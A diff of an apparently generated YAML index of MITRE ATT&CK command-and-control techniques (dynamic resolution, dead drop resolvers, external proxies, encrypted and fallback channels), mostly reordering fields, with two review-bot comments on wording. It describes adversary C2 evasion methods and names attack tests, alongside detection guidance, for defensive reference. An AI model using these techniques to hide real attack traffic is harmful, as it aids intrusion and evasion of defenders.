+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1102.001
@@ -43687,23 +45180,6 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Dead Drop Resolver
- description: |-
- Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
-
- Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
-
- Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
- id: attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-26T23:12:30.499Z'
- created: '2020-03-14T22:24:21.841Z'
x_mitre_platforms:
- Linux
- macOS
@@ -43751,23 +45227,23 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-14T23:29:19.581Z'
+ modified: '2020-06-20T20:53:20.398Z'
created: '2020-03-14T23:29:19.581Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted,
+ the Host field of the HTTP header can be checked if it matches the HTTPS SNI
+ or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking
+ Resistent Communication through domain fronting 2015)'
+ x_mitre_data_sources:
+ - SSL/TLS inspection
+ - Packet capture
+ x_mitre_contributors:
+ - Matt Kelly, @breakersall
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_contributors:
- - Matt Kelly, @breakersall
- x_mitre_data_sources:
- - SSL/TLS inspection
- - Packet capture
- x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted,
- the Host field of the HTTP header can be checked if it matches the HTTPS SNI
- or against a blacklist or whitelist of domain names. (Citation: Fifield Blocking
- Resistent Communication through domain fronting 2015)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1568.002:
technique:
@@ -43834,31 +45310,46 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-12T14:45:22.784Z'
created: '2020-03-10T17:44:59.787Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)
x_mitre_data_sources:
- DNS records
- Netflow/Enclave netflow
- Network device logs
- Packet capture
- Process use of network
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1568:
technique:
+ created: '2020-03-10T17:28:11.747Z'
+ modified: '2020-03-27T20:54:28.560Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b
+ description: |-
+ Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
+
+ Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ name: Dynamic Resolution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1568
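Review bot: The re-emitted x_mitre_detection text for T1568.002 in this hunk still says `if the randomness score is high, and the domains are not whitelisted (CDN, etc)`, while the domain-fronting entry touched by the same change was updated to `blocklist or allowlist`; the two should use the same terminology, e.g. `and the domains are not allowlisted (CDN, etc)`. The created/modified/created_by_ref fields alongside it suggest this index is generated from the ATT&CK STIX bundle, so the wording fix most likely belongs in the upstream data rather than as a hand edit of this file. The technique mapping continues past the end of the hunk.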
@@ -43879,21 +45370,6 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Dynamic Resolution
- description: |-
- Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
-
- Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- id: attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-27T20:54:28.560Z'
- created: '2020-03-10T17:28:11.747Z'
x_mitre_platforms:
- Linux
- macOS
@@ -43921,16 +45397,12 @@ command-and-control:
atomic_tests: []
T1573:
technique:
- id: attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118
- description: Adversaries may employ a known encryption algorithm to conceal
- command and control traffic rather than relying on any inherent protections
- provided by a communication protocol. Despite the use of a secure algorithm,
- these implementations may be vulnerable to reverse engineering if secret keys
- are encoded and/or generated within malware samples/configuration files.
- name: Encrypted Channel
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2020-03-16T15:33:01.739Z'
+ modified: '2020-03-30T00:37:16.809Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1573
@@ -43947,12 +45419,16 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-30T00:37:16.809Z'
- created: '2020-03-16T15:33:01.739Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Encrypted Channel
+ description: Adversaries may employ a known encryption algorithm to conceal
+ command and control traffic rather than relying on any inherent protections
+ provided by a communication protocol. Despite the use of a secure algorithm,
+ these implementations may be vulnerable to reverse engineering if secret keys
+ are encoded and/or generated within malware samples/configuration files.
+ id: attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118
x_mitre_version: '1.0'
x_mitre_is_subtechnique: false
x_mitre_detection: |-
@@ -44013,6 +45489,21 @@ command-and-control:
name: powershell
T1090.002:
technique:
+ created: '2020-03-14T23:12:18.466Z'
+ modified: '2020-03-27T17:50:37.411Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3
+ description: |-
+ Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
+
+ External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.
+ name: External Proxy
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1090.002
@@ -44025,21 +45516,6 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: External Proxy
- description: |-
- Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
-
- External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.
- id: attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-27T17:50:37.411Z'
- created: '2020-03-14T23:12:18.466Z'
x_mitre_platforms:
- Linux
- macOS
@@ -44061,12 +45537,8 @@ command-and-control:
atomic_tests: []
T1008:
technique:
- id: attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Fallback Channels
- description: Adversaries may use fallback or alternate communication channels
- if the primary channel is compromised or inaccessible in order to maintain
- reliable command and control and to avoid data transfer thresholds.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1008
@@ -44075,14 +45547,19 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: Adversaries may use fallback or alternate communication channels
+ if the primary channel is compromised or inaccessible in order to maintain
+ reliable command and control and to avoid data transfer thresholds.
+ name: Fallback Channels
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2019-07-17T21:17:03.445Z'
+ modified: '2020-07-14T19:49:47.340Z'
created: '2017-05-31T21:30:21.689Z'
+ x_mitre_is_subtechnique: false
x_mitre_version: '1.0'
x_mitre_data_sources:
- Malware reverse engineering
@@ -44137,19 +45614,19 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-27T16:10:37.183Z'
created: '2020-03-11T14:11:16.560Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - DNS records
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_detection: In general, detecting usage of fast flux DNS is difficult
due to web traffic load balancing that services client requests quickly. In
single flux cases only IP addresses change for static domain names. In double
flux cases, nothing is static. Defenders such as domain registrars and service
providers are likely in the best position for detection.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - DNS records
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1071.002:
technique:
@@ -44182,36 +45659,29 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-26T20:26:46.465Z'
created: '2020-03-15T16:16:25.763Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network protocol analysis
- - Process monitoring
- - Process use of network
- - Netflow/Enclave netflow
- - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect application
layer protocols that do not follow the expected protocol for the port that
is being used.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Process monitoring
+ - Process use of network
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1105:
technique:
- id: attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Ingress Tool Transfer
- description: Adversaries may transfer tools or other files from an external
- system into a compromised environment. Files may be copied from an external
- adversary controlled system through the command and control channel to bring
- tools into the victim network or through alternate protocols with another
- tool such as FTP. Files can also be copied over on Mac and Linux with native
- tools like scp, rsync, and sftp.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1105
@@ -44220,8 +45690,15 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: Adversaries may transfer tools or other files from an external
+ system into a compromised environment. Files may be copied from an external
+ adversary controlled system through the command and control channel to bring
+ tools into the victim network or through alternate protocols with another
+ tool such as FTP. Files can also be copied over on Mac and Linux with native
+ tools like scp, rsync, and sftp.
+ name: Ingress Tool Transfer
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -44603,24 +46080,24 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-15T00:46:26.598Z'
created: '2020-03-14T23:08:20.244Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process use of network
- - Process monitoring
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Analyze network data for uncommon data flows between clients
that should not or often do not communicate with one another. Processes utilizing
the network that do not normally have network communication or have never
been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1090.001
atomic_tests:
- name: Connection Proxy
@@ -44738,38 +46215,33 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-15T00:30:25.444Z'
created: '2020-03-15T00:30:25.444Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1071.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1071.003
- url: https://attack.mitre.org/techniques/T1071/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Mail Protocols
+ created: '2020-03-15T16:21:45.131Z'
+ modified: '2020-03-26T20:28:00.985Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b
description: "Adversaries may communicate using application layer protocols
associated with electronic map delivery to avoid detection/network filtering
by blending in with existing traffic. Commands to the remote system, and often
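Review bot: The T1071.003 description carried as context at the end of this hunk reads `associated with electronic map delivery`, which looks like a typo for `electronic mail delivery` — the technique is named Mail Protocols and the same paragraph goes on to talk about concealing data in email messages. The description is a scalar mirrored from the ATT&CK attack-pattern object (see the id and created_by_ref fields above it), so the correction probably belongs in the upstream source that this index is regenerated from; otherwise it will reappear on the next regeneration. The description scalar itself continues into the next hunk.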
@@ -44780,13 +46252,18 @@ command-and-control:
concealed. Data could also be concealed within the email messages themselves.
An adversary may abuse these protocols to communicate with systems under their
control within a victim network while also mimicking normal, expected traffic. "
- id: attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-26T20:28:00.985Z'
- created: '2020-03-15T16:21:45.131Z'
+ name: Mail Protocols
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1071.003
+ url: https://attack.mitre.org/techniques/T1071/003
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
x_mitre_platforms:
- Linux
- macOS
@@ -44828,26 +46305,27 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2019-06-21T14:45:42.314Z'
+ modified: '2020-07-14T19:43:38.181Z'
created: '2017-05-31T21:31:15.935Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_network_requirements: true
- x_mitre_detection: Host data that can relate unknown or suspicious process activity
- using a network connection is important to supplement any existing indicators
- of compromise based on malware command and control signatures and infrastructure.
- Relating subsequent actions that may result from Discovery of the system and
- network information or Lateral Movement to the originating process may also
- yield useful data.
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- Netflow/Enclave netflow
- Network device logs
- Network protocol analysis
- Packet capture
- Process use of network
- x_mitre_version: '1.0'
+ x_mitre_detection: Host data that can relate unknown or suspicious process activity
+ using a network connection is important to supplement any existing indicators
+ of compromise based on malware command and control signatures and infrastructure.
+ Relating subsequent actions that may result from Discovery of the system and
+ network information or Lateral Movement to the originating process may also
+ yield useful data.
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1090.003:
technique:
@@ -44873,21 +46351,21 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-14T23:23:41.770Z'
created: '2020-03-14T23:23:41.770Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network protocol analysis
- - Netflow/Enclave netflow
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: When observing use of Multi-hop proxies, network data from
the actual command and control servers could allow correlating incoming and
outgoing flows to trace malicious traffic back to its source. Multi-hop proxies
can also be detected by alerting on traffic to known anonymity networks (such
as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure
that uses this technique.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1026:
technique:
@@ -44914,13 +46392,13 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-30T13:59:11.272Z'
created: '2017-05-31T21:30:32.259Z'
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Packet capture
- - Netflow/Enclave netflow
- - Process use of network
- - Malware reverse engineering
- - Process monitoring
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
@@ -44928,13 +46406,13 @@ command-and-control:
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2) Correlating alerts between multiple
communication channels can further help identify command-and-control behavior.'
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ - Process use of network
+ - Malware reverse engineering
+ - Process monitoring
+ x_mitre_version: '1.0'
atomic_tests: []
T1095:
technique:
@@ -44969,9 +46447,18 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-11T15:09:26.624Z'
created: '2017-05-31T21:31:10.728Z'
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Ryan Becwar
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_network_requirements: true
+ x_mitre_detection: |-
+ Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.
+
+ Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
+
+ Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.
x_mitre_data_sources:
- Host network interface
- Netflow/Enclave netflow
@@ -44979,18 +46466,9 @@ command-and-control:
- Network protocol analysis
- Packet capture
- Process use of network
- x_mitre_detection: |-
- Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.
-
- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
-
- Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Ryan Becwar
+ x_mitre_version: '2.0'
identifier: T1095
atomic_tests:
- name: ICMP C2
@@ -45109,25 +46587,25 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-14T23:39:50.117Z'
created: '2020-03-14T23:39:50.117Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1571:
technique:
@@ -45165,23 +46643,23 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-26T22:02:25.221Z'
created: '2020-03-14T18:18:32.443Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - Process use of network
- - Netflow/Enclave netflow
- - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process use of network
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1571
atomic_tests:
- name: Testing usage of uncommonly used port with PowerShell
@@ -45252,16 +46730,10 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-26T23:26:10.109Z'
created: '2020-03-14T22:45:52.963Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Host network interface
- - Netflow/Enclave netflow
- - Network protocol analysis
- - Packet capture
- - SSL/TLS inspection
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
@@ -45269,17 +46741,23 @@ command-and-control:
will require SSL/TLS inspection if data is encrypted. Analyze network data
for uncommon data flows. User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Host network interface
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ - SSL/TLS inspection
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
- T1545.001:
+ T1205.001:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1545.001
- url: https://attack.mitre.org/techniques/T1545/001
+ external_id: T1205.001
